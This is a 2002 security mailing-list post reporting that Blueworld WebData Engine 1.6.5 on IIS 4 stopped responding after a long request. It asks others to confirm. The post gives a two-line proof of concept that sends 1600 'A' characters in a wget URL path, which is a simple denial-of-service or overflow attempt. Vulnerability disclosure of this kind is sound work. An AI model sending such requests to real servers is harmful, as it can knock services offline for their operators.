Blueworld WebData Engine 1.6.5

From: Replugge [Rod] (repluggeat_private)
Date: Thu Feb 14 2002 - 00:28:36 PST

Next message: Valdis.Kletnieksat_private: "Re: Infecting the KaZaA network? (moving here thread from 'traq)"

Previous message: Michel Arboi: "Re: directory traversal"
Next in thread: Replugge [Rod]: "RE: Blueworld WebData Engine 1.6.5"
Reply: Replugge [Rod]: "RE: Blueworld WebData Engine 1.6.5"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

The other day i run through a web server that was running 
Blueworld WebData Engine 1.6.5 and IIS 4, for my surprise after
sending a really "simple" attack the server stop responding,
could someone thats running WebData engine 1.6.5 verify this.

exploit:

export ATTACK=`perl -e "print 'A' x 1600"`
wget http://site.com/$ATTACK

I'm not sure about the conditions, perhaps it could be misconfiguration
of the server.


-- 
/* 
Rodrigo Gutierrez                   <rodrigoat_private>
Trustix AS                         http://www.trustix.com 
*/

Next message: Valdis.Kletnieksat_private: "Re: Infecting the KaZaA network? (moving here thread from 'traq)"
Previous message: Michel Arboi: "Re: directory traversal"
Next in thread: Replugge [Rod]: "RE: Blueworld WebData Engine 1.6.5"
Reply: Replugge [Rod]: "RE: Blueworld WebData Engine 1.6.5"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Feb 14 2002 - 14:36:05 PST